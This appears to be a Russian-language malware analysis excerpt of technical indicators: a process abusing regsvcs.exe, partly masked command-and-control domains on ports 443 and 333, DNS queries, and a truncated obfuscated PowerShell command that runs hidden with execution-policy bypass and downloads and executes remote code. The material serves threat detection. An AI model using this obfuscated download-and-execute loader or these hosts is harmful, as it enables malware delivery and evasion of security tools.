Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
- 'f.###4top.io':443
- 'la####e3.hopto.org':333
- DNS ASK f.###4top.io
- DNS ASK la####e3.hopto.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'